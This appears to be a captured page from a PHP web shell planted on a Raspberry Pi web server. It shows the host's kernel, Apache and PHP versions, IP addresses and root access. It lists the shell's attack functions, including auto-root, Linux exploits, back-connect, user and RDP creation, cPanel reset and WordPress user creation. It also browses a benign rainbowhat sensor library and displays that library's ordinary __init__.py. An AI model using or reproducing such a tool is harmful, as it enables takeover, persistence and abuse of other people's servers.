Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python2.7 /
dist-packages /
rainbowhat /
[ HOME SHELL ]
Name
Size
Permission
Action
HT16K33.py
4.41
KB
-rw-r--r--
HT16K33.pyc
3.85
KB
-rw-r--r--
__init__.py
1.09
KB
-rw-r--r--
__init__.pyc
1.36
KB
-rw-r--r--
alphanum4.py
8.01
KB
-rw-r--r--
alphanum4.pyc
6.44
KB
-rw-r--r--
apa102.py
3.59
KB
-rw-r--r--
apa102.pyc
4.88
KB
-rw-r--r--
bmp280.py
7.41
KB
-rw-r--r--
bmp280.pyc
6.27
KB
-rw-r--r--
buzzer.py
2.01
KB
-rw-r--r--
buzzer.pyc
2.55
KB
-rw-r--r--
lights.py
1.83
KB
-rw-r--r--
lights.pyc
3.26
KB
-rw-r--r--
touch.py
2.77
KB
-rw-r--r--
touch.pyc
4.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __init__.py
__version__ = '0.1.0' from . import apa102 from .bmp280 import bmp280 from .alphanum4 import AlphaNum4 from .touch import Buttons from .lights import Lights from . import buzzer from sys import version_info try: import smbus except ImportError: if version_info[0] < 3: raise ImportError("This library requires python-smbus\nInstall with: sudo apt-get install python-smbus") elif version_info[0] == 3: raise ImportError("This library requires python3-smbus\nInstall with: sudo apt-get install python3-smbus") try: import RPi.GPIO as GPIO except ImportError: if version_info[0] < 3: raise ImportError("This library requires python-rpi.gpio\nInstall with: sudo apt-get install python-rpi.gpio") elif version_info[0] == 3: raise ImportError("This library requires python3-rpi.gpio\nInstall with: sudo apt-get install python3-rpi.gpio") bus = None if GPIO.RPI_REVISION == 2 or GPIO.RPI_REVISION == 3: bus = smbus.SMBus(1) else: bus = smbus.SMBus(0) display = AlphaNum4(i2c=bus) touch = Buttons lights = Lights weather = bmp280(bus) rainbow = apa102
Close